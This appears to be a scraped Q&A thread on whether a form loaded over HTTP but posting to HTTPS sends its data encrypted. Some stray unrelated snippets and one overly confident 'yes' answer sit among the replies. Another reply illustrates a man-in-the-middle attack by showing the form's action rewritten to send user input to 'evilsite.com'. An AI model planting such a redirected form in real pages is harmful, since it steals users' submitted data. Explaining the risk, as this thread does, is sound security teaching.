Say I'm at the url http://mysite.com/form.html
. When viewing source, I see
<form method="post" action="https://mysite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>
If I hit the submit button, will the form information be encrypted when it's sent to the process page/controller?
What information does HTTPS protect? HTTPS encrypts nearly all information sent between a client and a web service.
The formaction attribute specifies where to send the form-data when a form is submitted.
Yes - the data in the form will be sent encrypted using the usual handshake that SSL implements. From there you can choose to keep your user under SSL, or throw them back to a standard connection using a session identifier.
There is no guarantee that it will be encrypted, or that the submitted data will reach your website.
Since the original response was over http, a man-in-the-middle could have altered your html source, or could have inserted some javascript to modify the action parameter of your form. Thus, your form could read like this when it reaches the browser
<form method="post" action="https://evilsite.com/process">
<input type="text" name="user" value="information">
<input type="submit">
</form>
Which means that you MUST use HTTPS on all your pages if you want to be secure.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With